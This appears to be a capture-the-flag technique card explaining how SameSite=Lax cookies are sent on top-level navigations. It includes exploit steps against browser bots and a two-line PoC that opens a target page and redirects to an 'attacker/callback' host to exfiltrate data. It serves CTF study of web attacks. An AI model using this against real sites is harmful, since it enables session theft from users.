pwneglyph logo

Note

web javascript samesite cookies csrf browser-bot exfiltration

Switch from iframe-based exfiltration to a top-level window so a SameSite=Lax cookie is actually sent.

SameSite=Lax Means Top-Level Navigation Sends the Cookie

SameSite=Lax cookies are withheld on most subresource or iframe requests, but sent on top-level cross-site navigations with safe methods. Attackers who see no cookie in an iframe wrongly conclude the cookie is inaccessible.

Why It Works

  • A top-level window.open / navigation to the target origin carries the Lax cookie, unlike an iframe subrequest.

Vulnerable Pattern

  • Bot-based exfiltration flows where the attacker sees no cookie in an iframe and gives up too early.

Exploit Flow

  1. Determine whether the target cookie is Lax, Strict, or unrestricted.
  2. If Lax, switch from iframe to a top-level window/tab that first visits the target origin.
  3. After the page loads with cookies, redirect or message back into your controlled origin.

Variations

  • window.open, navigation chains, opener-based channels, or same-window redirects inside the bot.

Common Blockers

  • Bot popup restrictions, cookie HttpOnly, or no usable exfil channel after the authenticated navigation.

PoC Sketch

const w = window.open("https://target/profile");
setTimeout(() => w.location = "https://attacker/callback", 1000);

Good Situations To Use It

  • The session cookie is SameSite=Lax.
  • A bot will follow a top-level navigation.
  • You only saw "no cookie" in an iframe test.

Sources

  • labossi_2026/web/trusted_support